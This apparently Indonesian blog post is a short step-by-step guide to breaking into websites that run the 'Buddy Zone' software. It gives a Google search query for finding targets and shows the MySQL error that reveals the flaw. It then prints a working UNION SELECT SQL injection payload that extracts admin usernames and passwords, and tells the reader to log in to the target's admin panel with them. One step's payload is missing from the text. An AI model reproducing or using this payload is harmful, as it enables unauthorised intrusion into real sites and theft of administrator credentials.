| allintext:"Powered By Buddy Zone" |
Setelah mendapat target...
maka dibelakang url ditambahkan ini
maka keluar error seperti ini
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/mydjbe/public_html/classes/news.class.php on line 58
lalu kita tambahkan ini lagi dibelakangnya
-1/**/UNION/**/ALL/**/SELECT/**/1,concat(admin_user,0x3a,admin_password),3,4,5,6/**/FROM/**/admin_users/*
seteleh loading2 bntr maka ID dan password admin akan kelihatan ^^
kalo udah dapat yg tinggal buka www.target.com/admin
silahkan login pake yg tadi ^^
happy ending :D
Tidak ada komentar:
Posting Komentar